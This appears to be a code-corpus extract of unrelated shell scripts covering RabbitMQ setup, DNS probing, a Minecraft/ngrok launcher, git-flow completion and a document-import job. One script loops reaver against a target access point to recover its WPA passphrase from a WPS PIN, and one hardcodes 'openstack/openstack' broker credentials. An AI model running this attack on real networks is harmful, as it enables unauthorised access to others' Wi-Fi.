cp /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh.example /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
chmod 755 /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
# Drop the template's existing ${OCF_RESKEY_ctl} lines...
sed -i '/^\${OCF_RESKEY_ctl}/d' /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
# echo '${OCF_RESKEY_ctl} set_policy ha-all "." '{"ha-mode":"all", "ha-sync-mode":"automatic"}' --apply-to all --priority 0' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
# ...and append our own: mirror all queues and create the openstack user.
echo '${OCF_RESKEY_ctl} set_policy ha-all "." '\''{"ha-mode":"all", "ha-sync-mode":"automatic"}'\'' --apply-to all --priority 0' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
echo '${OCF_RESKEY_ctl} add_user openstack openstack' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
echo '${OCF_RESKEY_ctl} set_permissions openstack ".*" ".*" ".*" ' >>/usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh
| true
|
2f1afe42fefec09417da8626cc74e7f70842b9c4
|
Shell
|
chopins/chopins.github.com
|
/download/pdnss
|
UTF-8
| 2,561
| 3.609375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Probe a list of public DNS servers for A records of a domain and print,
# in BIND zone-file syntax, every IPv4 address that actually answers an
# HTTPS request for that domain.
# Usage: pdnss [-n www.domain.com] [-d http://host/ns.list.txt]
# Let Ctrl-C / TERM flip the EX flag before exiting.
trap 'EX=1;exit' INT
trap 'EX=1;exit' TERM
EX=0
# Default source of nameserver IPs (one address per line).
NSIPLIST='http://public-dns.info/nameservers.txt'
# Cache of IPs already probed this run, so each address is checked once.
CACHE=$(dirname $(realpath $0))/cacheip.txt
echo '' > $CACHE
# Hand-rolled option parsing: 3 = flag not seen, 1 = flag seen (its
# value is expected in the next argument), 2 = value consumed.
has_dns=3
has_domain=3
for arg in $*
do
    if [ $has_dns -eq 1 ];then
        NSIPLIST=$arg
        has_dns=2
        continue
    fi
    if [ $has_domain -eq 1 ];then
        DOMAIN=$arg
        has_domain=2
        continue
    fi
    case $arg in
        -h)
        echo "Usage: $0 -n www.domain.com -d http://test11.com/ns.list.txt"
        exit
        ;;
        -d)
        has_dns=1
        ;;
        -n)
        has_domain=1
        ;;
    esac
done
# Defaults when -n was not given: probe www.google.com with a wildcard
# record name.
if [ $# -eq 0 ];then
    DOMAIN='www.google.com'
    A='*'
elif [ $has_dns -eq 2 ] && [ $has_domain -eq 3 ]; then
    DOMAIN='www.google.com'
    A='*'
elif [ $has_dns -eq 3 ] && [ $has_domain -eq 3 ];then
    DOMAIN=$1
fi
# Derive the zone record name: "@" for bare two-label domains, otherwise
# the subdomain labels (everything except the last two).
IFS='.' read -ra NSP <<< "$DOMAIN"
if [ ${#NSP[@]} -lt 3 ];then
    A='@'
else
    SUB=$[${#NSP[@]} - 2]
    A=${NSP[@]:0:$SUB}
fi
echo "Fetch $DOMAIN in $NSIPLIST"
# NOTE(review): both while loops below run in pipeline subshells, so the
# EX flag set by the INT/TERM traps in the parent shell is not visible
# inside them; the "[ $EX -eq 1 ]" checks likely never fire — confirm.
curl -s $NSIPLIST | while read -ra LINE;do
    if [ $EX -eq 1 ];then
        exit
    fi
    ns=$LINE
    # Skip IPv6 nameservers (addresses containing ':').
    NS_IPV6=`echo $ns | grep ':'`
    NS_CHK_IPV6=$?
    if [ $NS_CHK_IPV6 -eq 0 ];then
        continue
    fi
    echo -ne "DNS $ns \r"
    # Ask this nameserver for the domain's records over TCP.
    dig $DOMAIN @$ns +tcp | while read -ra LINE;do
    {
        echo $LINE
        if [ $EX -eq 1 ];then
            exit
        fi
        cont=0
        # Skip dig's ';' comment lines and blank lines.
        F=${LINE[0]:0:1}
        case $F in
            ';')
            continue
            ;;
        esac
        if [ -z $F ];then
            continue
        fi
        # Answer-section rows look like: name ttl IN A address
        if [ "${LINE[3]}" == 'A' ];then
            IP=${LINE[4]}
            # Skip IPv6 answers.
            IPV6=`echo $IP | grep ':'`
            CHK_IPV6=$?
            if [ $CHK_IPV6 -eq 0 ];then
                continue
            fi
            # Probe each IP only once per run.
            grep -q $IP $CACHE
            RET=$?
            if [ $RET -eq 0 ];then
                continue
            fi
            echo $IP >> $CACHE
            #timeout 5 bash -c "echo >/dev/tcp/$IP/443" >/dev/null 2>&1 && echo "$A IN A $IP"
            #OPENRE=`echo "\n" | timeout 10 openssl s_client -host $IP -port 443 -verify_hostname $ds -4 -quiet --verify 1 -prexit -crlf 2>&1`
            # Verify the IP actually serves the domain over HTTPS.
            curl -s --retry 0 --connect-timeout 3 --resolve $DOMAIN:443:$IP https://$DOMAIN > /dev/null
            ORN=$?
            if [ $ORN -gt 0 ];then
                echo -ne "check $IP timeout \r"
                continue
            elif [ $ORN -eq 0 ];then
                # Reachable: emit a zone-file A record line.
                echo -e "\r$A IN A $IP"
            fi
            wait
        fi
    }
    done
    wait
done
| true
|
e0715d2d9f2bd0be5b7bf646d7581c93b2dd9da5
|
Shell
|
ElComeback/Kuminecraft-v.2.0-SP
|
/bin/minecraft.sh
|
UTF-8
| 1,607
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
# Open the ngrok TCP tunnel; if it exits, retry after 10 seconds.
# Runs forever (it is launched in the background below).  Note the
# "Fallido" message is only printed after ngrok terminates, because
# ngrok blocks while the tunnel is up.
start_tunnel(){
  while true
  do
    echo -n "Iniciando Ngrok... "
    bin/ngrok tcp -authtoken $NGROK_API_TOKEN -log stdout --log-level debug ${mc_port} &> ngrok.log
    echo -n "Fallido, reintentando en 10 segundos... "
    sleep 10
  done
}
# SIGTERM handler: stop the Java server ($1) and the ngrok tunnel ($2),
# wait for the server to exit, run a final world sync, then quit cleanly.
graceful_shutdown(){
  echo "Terminando $1 and $2"
  kill $1 $2
  wait $1
  node last_sync.js
  exit 0
}
# Give the previous instance time to shut down before taking over.
echo 'Esperando 30 segundos para terminar la instancia'
sleep 30
echo 'Iniciando Despliegue'
mc_port=25565
# Both API tokens are mandatory: ngrok exposes the TCP port, Dropbox
# stores the world data.
if [ -z "$NGROK_API_TOKEN" ]; then
  echo "Necesitas definir el valor NGROK_API_TOKEN para crear el tunel TCP!"
  exit 2
fi
if [ -z "$DROPBOX_API_TOKEN" ]; then
  echo "Necesitar definir el valor DROPBOX_API_TOKEN para sincronizar a Dropbox!"
  exit 3
fi
# Start the ngrok tunnel (retries forever in the background).
start_tunnel &
ngrok_pid=$!
# Download the world.
node init.js
# Create the server configuration on first run.
if [ ! -f server.properties ]; then
  echo "server-port=${mc_port}" >> server.properties
fi
touch whitelist.json
touch banned-players.json
touch banned-ips.json
touch ops.json
# Maximum heap size, configurable through $HEAP (default 1G).
heap=${HEAP:-"1G"}
echo "Iniciando: minecraft ${mc_port}"
java -Xmx${heap} -Xms${heap} -Xss512k -XX:+UseConcMarkSweepGC -jar server.jar nogui &
java_pid=$!
# trap "kill $ngrok_pid $java_pid" SIGTERM
# On SIGTERM, stop both children and do a final world sync.
trap "graceful_shutdown $java_pid $ngrok_pid" SIGTERM
# Continuously sync the world.
node sync_world.js &
# Serve HTTP on port $PORT.
node index.js &
# Curl the app every 25 minutes to keep it from being suspended.
while true
do
  curl --silent 'http://herokucraft.herokuapp.com/' &> /dev/null
  sleep 1500
done
| true
|
5b0191af795a5dddac25447ab7815c0c3cd218b7
|
Shell
|
xdamatada/dirty_rom_cooker
|
/scripts/buildscripts/prepdownload.sh
|
UTF-8
| 755
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Download the AOSP "repo" launcher into ~/dirty/bin, walk the user
# through the one-time .bashrc setup, then reboot so the environment
# changes take effect.
echo "Downloading the Source. Please wait"
echo "This will take anywhere between 30"
echo "minutes and four hours (Depending on"
echo "network Speed. This requires a 5-6gb"
echo "download"
echo
echo
echo "Downloading Repo"
cd ~/
mkdir -p ~/dirty/bin
export PATH=${PATH}:~/dirty/bin
curl https://dl-ssl.google.com/dl/googlesource/git-repo/repo > ~/dirty/bin/repo
# Make the freshly downloaded launcher executable.
# Bug fix: this used to run `chmod a+x ~/bin/repo`, which is not where
# the file was just saved, so `repo` was never executable.
chmod a+x ~/dirty/bin/repo
echo "Please paste the following from bash.txt to the TOP of .bashrc (will open when you press enter)"
read -p "Press enter to continue"
gedit ~/dirty/bash.txt
gedit ~/.bashrc
echo "Please reboot your PC. Press enter to reboot, then reload the menu, and hit option 4 under Build to begin source download"
read -p "Press enter to reboot"
sudo shutdown -r now
| true
|
9c0b73a5d3b1c763ca59190a5c1036b860212b8b
|
Shell
|
kdruelle/zsh
|
/plugins/git/git.flow.comp.zsh
|
UTF-8
| 15,253
| 3.734375
| 4
|
[] |
no_license
|
#!zsh
#
# Installation
# ------------
#
# To achieve git-flow completion nirvana:
#
# 0. Update your zsh's git-completion module to the newest verion.
# From here. http://zsh.git.sourceforge.net/git/gitweb.cgi?p=zsh/zsh;a=blob_plain;f=Completion/Unix/Command/_git;hb=HEAD
#
# 1. Install this file. Either:
#
# a. Place it in your .zshrc:
#
# b. Or, copy it somewhere (e.g. ~/.git-flow-completion.zsh) and put the following line in
# your .zshrc:
#
# source ~/.git-flow-completion.zsh
#
# c. Or, use this file as a oh-my-zsh plugin.
#
# Portability wrapper around sed's extended-regex flag: BSD/macOS sed
# uses -E while GNU sed on Linux uses -r.  All arguments are forwarded
# to sed.  Returns sed's status, or 1 on an unrecognised OS.
# Bug fix: the Linux branch tested "$(name)" instead of "$(uname)", so
# it never matched and the function returned 1 without running sed on
# Linux.  Arguments are now also quoted ("$@") so filenames/patterns
# with spaces survive.
__git_flow_exsed(){
    if [[ "$(uname)" == "Darwin" ]]; then
        sed -E "$@"
        return $?
    elif [[ "$(uname)" == "Linux" ]]; then
        sed -r "$@"
        return $?
    fi
    return 1
}
# Top-level zsh completion entry point for `git flow`: completes the
# subcommand name first, then dispatches to the per-subcommand helpers.
_git-flow ()
{
	local curcontext="$curcontext" state line
	typeset -A opt_args
	_arguments -C \
		':command:->command' \
		'*::options:->options'
	case $state in
		(command)
			local -a subcommands
			subcommands=(
				'init:Initialize a new git repo with support for the branching model.'
				'feature:Manage your feature branches.'
				'release:Manage your release branches.'
				'hotfix:Manage your hotfix branches.'
				'support:Manage your support branches.'
				'version:Shows version information.'
				'config:Manage your git-flow configuration.'
				'log:Show log deviating from base branch.'
			)
			_describe -t commands 'git flow' subcommands
		;;
		(options)
			# Complete the chosen subcommand's own options/arguments.
			case $line[1] in
				(init)
					_arguments \
						-f'[Force setting of gitflow branches, even if already configured]' \
						--showcommands'[Show git commands while executing them]' \
						{'--delete','-d'}'[Use default branch naming conventions]' \
						--local'[utiliser le fichier de configuration du dépôt]' \
						--global'[utiliser les fichier de configuration global]' \
						--system'[utiliser le fichier de configuration du système]' \
						--file'[utiliser le fichier de configuration spécifié]:config file:_path_files'
				;;
				(version)
				;;
				(hotfix)
					__git-flow-hotfix
				;;
				(release)
					__git-flow-release
				;;
				(feature)
					__git-flow-feature
				;;
			esac
		;;
	esac
}
# Completion for `git flow release <subcommand> ...`.  Release names are
# completed from the local release-branch list (__git_flow_version_list).
__git-flow-release ()
{
	local curcontext="$curcontext" state line
	typeset -A opt_args
	_arguments -C \
		':command:->command' \
		'*::options:->options'
	case $state in
		(command)
			local -a subcommands
			subcommands=(
				'start:Start a new release branch.'
				'finish:Finish a release branch.'
				'list:List all your release branches. (Alias to `git flow release`)'
				'publish:Publish release branch to remote.'
				'track:Checkout remote release branch.'
			)
			_describe -t commands 'git flow release' subcommands
			_arguments \
				-v'[Verbose (more) output]'
		;;
		(options)
			case $line[1] in
				(start)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--fetch','-F'}'[Fetch from origin before performing finish]'\
						{'--verbose','-v'}'[Verbose (more) output]'
						':version:__git_flow_version_list'
				;;
				(finish)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--fetch','-F'}'[Fetch from origin before performing finish]'\
						{'--sign','-s'}'[Sign the release tag cryptographically]'\
						{'--signingkey','-u'}'[Use the given GPG-key for the digital signature (implies -s)]'\
						{'--message','-m'}'[Use the given tag message]'\
						{'--mesagefile','-f'}'[...]:message file:_path_files' \
						{'--push','-p'}'[Push to $ORIGIN after performing finish]' \
						{'--keep','-k'}'[Keep branch after performing finish]' \
						--keepremote'[Keep the remote branch]' \
						--keeplocal'[Keep the local branch]' \
						{'--force_delete','-d'}'[Force delete release branch after finish]' \
						{'--notag','-n'}"[Don't tag this release]" \
						{'--nobackmerge','-b'}"[Don't back-merge master, or tag if applicable, in develop]" \
						{'--squash','-S'}'[Squash release during merge]' \
						':version:__git_flow_version_list'
				;;
				(publish)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':version:__git_flow_version_list'
				;;
				(track)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':version:__git_flow_version_list'
				;;
				*)
					_arguments \
						-v'[Verbose (more) output]'
				;;
			esac
		;;
	esac
}
# Completion for `git flow hotfix <subcommand> ...`.  Hotfix names are
# completed from the local/remote hotfix-branch lists.
__git-flow-hotfix ()
{
	local curcontext="$curcontext" state line
	typeset -A opt_args
	_arguments -C \
		':command:->command' \
		'*::options:->options'
	case $state in
		(command)
			local -a subcommands
			subcommands=(
				'start:Start a new hotfix branch.'
				'finish:Finish a hotfix branch.'
				'track:Checkout remote feature branch.'
				'list:List all your hotfix branches. (Alias to `git flow hotfix`)'
			)
			_describe -t commands 'git flow hotfix' subcommands
			_arguments \
				-v'[Verbose (more) output]'
		;;
		(options)
			case $line[1] in
				(start)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--fetch','-F'}'[Fetch from origin before performing finish]'\
						':hotfix:__git_flow_version_list'\
						':branch-name:__git_branch_names'
				;;
				(finish)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--fetch','-F'}'[Fetch from origin before performing finish]'\
						{'--sign','-s'}'[Sign the release tag cryptographically]'\
						{'--signingkey','-u'}'[Use the given GPG-key for the digital signature (implies -s)]'\
						{'--message','-m'}'[Use the given tag message]'\
						{'--mesagefile','-f'}'[...]:message file:_path_files' \
						{'--push','-p'}'[Push to $ORIGIN after performing finish]' \
						{'--keep','-k'}'[Keep branch after performing finish]' \
						--keepremote'[Keep the remote branch]' \
						--keeplocal'[Keep the local branch]' \
						{'--force_delete','-d'}'[Force delete release branch after finish]' \
						{'--notag','-n'}"[Don't tag this release]" \
						{'--nobackmerge','-b'}"[Don't back-merge master, or tag if applicable, in develop]" \
						':hotfix:__git_flow_hotfix_list'
				;;
				(track)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':hotfix:__git_flow_remote_hotfix_list'\
				;;
				*)
					_arguments \
						-v'[Verbose (more) output]'
				;;
			esac
		;;
	esac
}
# Completion for `git flow feature <subcommand> ...`.  Feature names are
# completed from the local/remote feature-branch lists.
__git-flow-feature ()
{
	local curcontext="$curcontext" state line
	typeset -A opt_args
	_arguments -C \
		':command:->command' \
		'*::options:->options'
	case $state in
		(command)
			local -a subcommands
			subcommands=(
				'start:Start a new feature branch.'
				'finish:Finish a feature branch.'
				'list:List all your feature branches. (Alias to `git flow feature`)'
				'publish:Publish feature branch to remote.'
				'track:Checkout remote feature branch.'
				'diff:Show all changes.'
				'rebase:Rebase from integration branch.'
				'checkout:Checkout local feature branch.'
				'pull:Pull changes from remote.'
				'delete:Delete a feature branch.'
			)
			_describe -t commands 'git flow feature' subcommands
			_arguments \
				-v'[Verbose (more) output]'
		;;
		(options)
			case $line[1] in
				(start)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--fetch','-F'}'[Fetch from origin before performing finish]'\
						':feature:__git_flow_feature_list'\
						':branch-name:__git_branch_names'
				;;
				(finish)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--fetch','-F'}'[Fetch from origin before performing finish]'\
						{'--rebase','-r'}'[Rebase before merging]' \
						{'--preserve-merges','-p'}'[Preserve merges while rebasing]' \
						{'--keep','-k'}'[Keep branch after performing finish]' \
						--keepremote'[Keep the remote branch]' \
						--keeplocal'[Keep the local branch]' \
						{'--force_delete','-D'}'[Force delete feature branch after finish]' \
						{'--squash','-S'}'[Squash feature during merge]' \
						--no-ff'[Never fast-forward during the merge]' \
						':feature:__git_flow_feature_list'
				;;
				(publish)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':feature:__git_flow_feature_list'\
				;;
				(track)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':feature:__git_flow_remote_feature_list'\
				;;
				(diff)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':branch:__git_branch_names'\
				;;
				(rebase)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						{'--interactive','-i'}'[Do an interactive rebase]' \
						{'--preserve-merges','-p'}'[Preserve merges]' \
						':branch:__git_branch_names'
				;;
				(checkout)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':branch:__git_flow_feature_list'\
				;;
				(pull)
					_arguments \
						--showcommands'[Show git commands while executing them]' \
						':remote:__git_remotes'\
						':branch:__git_branch_names'
				;;
				*)
					_arguments \
						-v'[Verbose (more) output]'
				;;
			esac
		;;
	esac
}
# Completion candidates: names of local release branches
# (`git flow release list`, with markers/whitespace stripped).
__git_flow_version_list ()
{
	local expl
	declare -a versions
	versions=(${${(f)"$(_call_program versions git flow release list 2> /dev/null | tr -d ' |*')"}})
	__git_command_successful || return
	_wanted versions expl 'version' compadd $versions
}
# Completion candidates: names of local feature branches.
__git_flow_feature_list ()
{
	local expl
	declare -a features
	features=(${${(f)"$(_call_program features git flow feature list 2> /dev/null | tr -d ' |*')"}})
	__git_command_successful || return
	_wanted features expl 'feature' compadd $features
}
# Completion candidates: feature branches on the remote
# (origin/feature/<name> entries reduced to <name>).
__git_flow_remote_feature_list ()
{
	local expl
	declare -a features
	features=(${${(f)"$(_call_program rfeatures git branch -r | grep -E "feature/[-A-Za-z0-9]+" | __git_flow_exsed 's# *origin/feature/([-A-Za-z0-9]+).*#\1#g' 2> /dev/null)"}})
	__git_command_successful || return
	_wanted features expl 'feature' compadd $features
}
# Completion candidates: configured git remotes, falling back to files
# under $GIT_DIR/remotes for legacy setups.
__git_remotes () {
	local expl gitdir remotes
	gitdir=$(_call_program gitdir git rev-parse --git-dir 2>/dev/null)
	__git_command_successful || return
	remotes=(${${(f)"$(_call_program remotes git config --get-regexp '"^remote\..*\.url$"')"}//#(#b)remote.(*).url */$match[1]})
	__git_command_successful || return
	# TODO: Should combine the two instead of either or.
	if (( $#remotes > 0 )); then
		_wanted remotes expl remote compadd $* - $remotes
	else
		_wanted remotes expl remote _files $* - -W "($gitdir/remotes)" -g "$gitdir/remotes/*"
	fi
}
# Completion candidates: names of local hotfix branches.
__git_flow_hotfix_list ()
{
	local expl
	declare -a hotfixes
	hotfixes=(${${(f)"$(_call_program hotfixes git flow hotfix list 2> /dev/null | tr -d ' |*')"}})
	__git_command_successful || return
	_wanted hotfixes expl 'hotfix' compadd $hotfixes
}
# Completion candidates: hotfix branches only present on the remote.
__git_flow_remote_hotfix_list ()
{
	local expl
	declare -a hotfixes
	hotfixes=(${${(f)"$(_call_program rhotfixes git branch -r | grep -E "hotfix/[-A-Za-z0-9\.]+" | __git_flow_exsed 's# *origin/hotfix/([-A-Za-z0-9\.]+).*#\1#g' 2> /dev/null)"}})
	__git_command_successful || return
	_wanted hotfixes expl 'hotfix' compadd $hotfixes
}
# Completion candidates: all local branch names (refs/heads/*).
__git_branch_names () {
	local expl
	declare -a branch_names
	branch_names=(${${(f)"$(_call_program branchrefs git for-each-ref --format='"%(refname)"' refs/heads 2>/dev/null)"}#refs/heads/})
	__git_command_successful || return
	_wanted branch-names expl branch-name compadd $* - $branch_names
}
# Abort completion with a message when any stage of the last pipeline
# failed (zsh's $pipestatus holds every stage's exit code).
__git_command_successful () {
	if (( ${#pipestatus:#0} > 0 )); then
		_message 'not a git repository'
		return 1
	fi
	return 0
}
# Register `flow` as a git user-command so `git <TAB>` offers it.
zstyle -s ':completion:*:*:git:*' user-commands user_commands "#"
user_commands+="#flow:provide high-level repository operations"
zstyle ':completion:*:*:git:*' user-commands ${(@s/#/)user_commands}
| true
|
30bdd9eaa593b4f0e60c7b01ea9e78937afda545
|
Shell
|
alcarl/auto-reaver
|
/reCheckFoundPin
|
UTF-8
| 1,978
| 4.15625
| 4
|
[] |
no_license
|
#!/bin/bash
# following script was created to deal with situation when only PIN is printed, but not WPA PSK
# so script searches WPA PSK until reaver spits it out, using while loop
# perl checks wheter PSK is printed, if so, exit is called.
# Arguments: $1 = known WPS PIN, $2 = target BSSID, $3 = channel (optional).
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "There's common situation that reaver finds pin, but without passphrase";
    echo "Following script has been written to find passphrase - in case you know the pin";
    echo "So for this purpose I wrote following script - you can use it if you have the same problem";
    echo "Usage ( [obligatory parameter], [[optional parameter]] ):";
    echo "$0 [PIN] [BSSID] [[CHANNEL]]";
    echo "Example usage:"
    echo "$0 12345679 AA:BB:CC:DD:EE:FF";
    exit;
fi
# Strip the colons from a MAC address (AA:BB:CC:DD:EE:FF -> AABBCCDDEEFF).
# Uses a parameter expansion instead of the previous unquoted
# `echo $1 | sed s/://g` pipeline (no word-splitting/glob risk, no forks).
clearBssid(){
    echo "${1//:/}";
}
# Print the name of the monitor-mode interface (e.g. "mon0"/"wlan0mon")
# by scanning ifconfig output for interface names containing "mon".
getMonitorName(){
    ifconfig | perl -lane '{ if(/^[^\s]*mon/){ $_ =~ s/\s+.*//; print $_; } }'
}
# Marker files: TMP_FILE appears once the PSK has been found; the
# activity file's mtime records the last WPS M3 exchange (watchdog input).
TMP_FILE="/tmp/reCheckFoundPinTMP";
TMP_ACTIVITY_FILE="/tmp/reCheckFoundPinACTIVITY";
CUR_DIR=$(pwd);
PIN=$1;
BSSID=$2;
BSSID_CLEAR=$(clearBssid $BSSID);
CHANNEL_CMD="";
# The recovered passphrase is appended here (named after the colon-less BSSID).
WRITE_FOUND_PASS_TO=$CUR_DIR'/'$BSSID_CLEAR'_FOUND_PASSWORD.txt';
MONITOR_NAME=$(getMonitorName);
# Put the wireless card in monitor mode if no mon interface exists yet.
# NOTE(review): if getMonitorName printed nothing, this grep runs with an
# empty pattern and always matches — confirm intended.
if [[ -z "$(ifconfig | grep $MONITOR_NAME)" ]]; then
    airmon-ng start wlan0;
fi
if [[ -n "$3" ]]; then
    CHANNEL_CMD="--channel=$3 ";
fi
# Start from a clean "PSK found" marker.
if [[ -f $TMP_FILE ]]; then
    rm $TMP_FILE;
fi
touch $TMP_ACTIVITY_FILE;
# Keep re-running reaver with the known PIN until the PSK marker appears.
while true; do
    if [[ -f $TMP_FILE ]]; then
        rm $TMP_FILE;
        exit;
    fi
    sleep 2;
    COMMAND="reaver -p $PIN -i $MONITOR_NAME -b $BSSID -vv -t 20 -g 1 -S -N $CHANNEL_CMD";
    echo $COMMAND;
    # The inline perl filter: refresh the activity stamp on "Received M3"
    # lines, persist the passphrase and set the exit marker on "WPA PSK"
    # lines, and otherwise kill reaver if checkFileTouchTimeout.sh reports
    # no activity for 60 s (stall watchdog).
    eval $COMMAND | perl -lane '
    if (/Received M3/){
        print $_;
        system("touch '$TMP_ACTIVITY_FILE'");
    }
    elsif (/WPA PSK/){
        print $_;
        open (F, ">>'$WRITE_FOUND_PASS_TO'");
        print F $_;
        close (F);
        system("touch '$TMP_FILE'");
    }
    else {
        print $_;
        system("if [[ \"$('$CUR_DIR'/checkFileTouchTimeout.sh '$TMP_ACTIVITY_FILE' 60)\" == \"1\" ]]; then killall reaver; fi;");
    }
    ';
done
| true
|
95939098f1de8f9a0fcca3b2ee4e1f53278a8c5e
|
Shell
|
MarriShruthi/first
|
/empWageSal.sh
|
UTF-8
| 240
| 3.421875
| 3
|
[] |
no_license
|
#!/bin/bash -x
# Simulate an employee's daily attendance and compute the day's wage:
# a present employee earns empRatePerHr * empHrs, an absent one earns 0.
isPresent=1;
# 0 or 1 at random; matching isPresent (1) means the employee turned up.
randomCheck=$(( RANDOM%2 ))
if [ $isPresent -eq $randomCheck ]
then
	echo "Employee is present";
	empRatePerHr=20;
	# Bug fix: was "e	mpHrs=8;" — the stray split ran a bogus `e`
	# command and left empHrs unset.
	empHrs=8;
	# Bug fix: the rate variable was misspelled "empRaePerHr", which
	# emptied the arithmetic expression and made it error out.
	salary=$(($empHrs*$empRatePerHr))
else
	echo "Employee is absent";
	salary=0;
fi
| true
|
8c13954ffdfe9d70d09ea8142dc3d49265b22e01
|
Shell
|
bandgeekndb/imageNow
|
/Bash/commonAppImport.sh
|
UTF-8
| 11,476
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
# Nightly Common App import: unzip the campus SDS deliveries, log what
# arrived, quarantine/report broken PDFs, and notify each campus.
set -o errexit

### --- Configuration --- ###

# Set this to 1 if you need to load some files and don't want emails to go to everybody.
sneakLoading="0"
# Set this to 1 if we're at the low point in the cycle and may expect fewer than the full amount of zips.
cycleMessage="1"

if [ $sneakLoading == 1 ]; then
  # Enter the email addresss to send notifications to here:
  sneakEmail="gjenczyk@umassp.edu"
  alertEmail=$sneakEmail
  errorReportEmail=$sneakEmail
  bostonAlert=$sneakEmail
  dartmouthAlert=$sneakEmail
  lowellAlert=$sneakEmail
  bostonErrors=$sneakEmail
  dartmouthErrors=$sneakEmail
  lowellErrors=$sneakEmail
  # Suffix appended to log file names so manual runs are distinguishable.
  runType="_MANUAL"
else
  alertEmail="UITS.DI.CORE@umassp.edu"
  errorReportEmail="UITS.DI.CORE@umassp.edu caohelp@commonapp.net"
  bostonAlert="UITS.DI.CORE@umassp.edu john.drew@umb.edu lisa.williams@umb.edu krystal.burgos@umb.edu"
  dartmouthAlert="UITS.DI.CORE@umassp.edu athompson@umassd.edu kmagnusson@umassd.edu j1mello@umassd.edu kvasconcelos@umassd.edu mortiz@umassd.edu"
  lowellAlert="UITS.DI.CORE@umassp.edu christine_bryan@uml.edu kathleen_shannon@uml.edu"
  bostonErrors="UITS.DI.CORE@umassp.edu caohelp@commonapp.net john.drew@umb.edu lisa.williams@umb.edu krystal.burgos@umb.edu"
  dartmouthErrors="UITS.DI.CORE@umassp.edu caohelp@commonapp.net athompson@umassd.edu kmagnusson@umassd.edu j1mello@umassd.edu kvasconcelos@umassd.edu mortiz@umassd.edu"
  lowellErrors="UITS.DI.CORE@umassp.edu caohelp@commonapp.net christine_bryan@uml.edu kathleen_shannon@uml.edu"
  # Bug fix: this was assigned to lowercase "runtype", leaving ${runType}
  # unset everywhere else (it only worked because nounset is off).
  runType=""
fi

errorBody="Common App Support: Please regenerate and resend the the attached records via SDS.
Contact the UMass Document Imaging team (UITS.DI.CORE@umassp.edu) with any questions.
-
DO NOT REPLY TO THIS EMAIL."

### --- Libraries and functions --- ###
# Logging library for ImageNow
source "/export/$(hostname -s)/inserver6/script/lib/DILogger-Library.sh"
# Locking library (NFS safe)
source "/export/$(hostname -s)/inserver6/script/lib/MutexLock-Library.sh"

# BEGIN RUNNING LOG
errorCode="0"
runLogDelim="*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*"
runLog="/export/$(hostname -s)/inserver6/log/${runType}commonAppImport_run_log.log"
runLock="/export/$(hostname -s)/inserver6/script/lock/commonAppImport.lock"
echo ${runLogDelim} >> ${runLog}
echo "$(date) - BEGINING commonAppImport.sh" >> ${runLog}
# usage: DIImportLogging.log "sub-process name" "campus abbreviation" "header string" "info to log"
# globals (read): DIImportLogging_workingPath, runType
# Appends one CSV record to the dated per-campus log, writing the header
# row first if this is the file's first record.
function DIImportLogging.log {
  local today target
  today="$(date +%Y-%m-%d)"
  # Files are named "<date>|<campus>|Common_App|<sub-process><runType>.csv".
  target="${DIImportLogging_workingPath}${today}|${2}|Common_App|${1}${runType}.csv"
  # First write creates the file with its CSV header.
  [[ -e "${target}" ]] || echo "${3}" > "${target}"
  echo "${4}" >> "${target}"
}
# Translate a feed campus code (UMBOS/UMDAR/UMLOW) into the admissions
# campus code used in log file names (UMBUA/UMDUA/UMLUA).  Prints
# nothing for unknown codes; always returns 0.
function translateCampusName {
  local code=""
  if [[ "$1" == "UMBOS" ]]; then
    code="UMBUA"
  elif [[ "$1" == "UMDAR" ]]; then
    code="UMDUA"
  elif [[ "$1" == "UMLOW" ]]; then
    code="UMLUA"
  fi
  if [[ -n "$code" ]]; then
    echo "$code"
  fi
  return 0
}
# One-letter campus abbreviation (B/D/L) used in notification text.
# Prints nothing for unknown codes; always returns 0.
function shortCampusName {
  local letter=""
  case "$1" in
    UMBOS) letter="B" ;;
    UMDAR) letter="D" ;;
    UMLOW) letter="L" ;;
  esac
  if [[ -n "$letter" ]]; then
    echo "$letter"
  fi
  return 0
}
# Human-readable campus name for email subjects/bodies.
# Prints nothing for unknown codes.
function longCampusName {
  if [[ "$1" == "UMBOS" ]]; then
    echo "UMass Boston"
  elif [[ "$1" == "UMDAR" ]]; then
    echo "UMass Dartmouth"
  elif [[ "$1" == "UMLOW" ]]; then
    echo "UMass Lowell"
  fi
}
# Notification recipient list for the given campus; reads the *Alert
# globals configured at the top of the script.  (echo is deliberately
# left unquoted, matching how the list is consumed by mailx.)
function campusEmail {
  if [[ "$1" == "UMBOS" ]]; then
    echo ${bostonAlert}
  elif [[ "$1" == "UMDAR" ]]; then
    echo ${dartmouthAlert}
  elif [[ "$1" == "UMLOW" ]]; then
    echo ${lowellAlert}
  fi
}
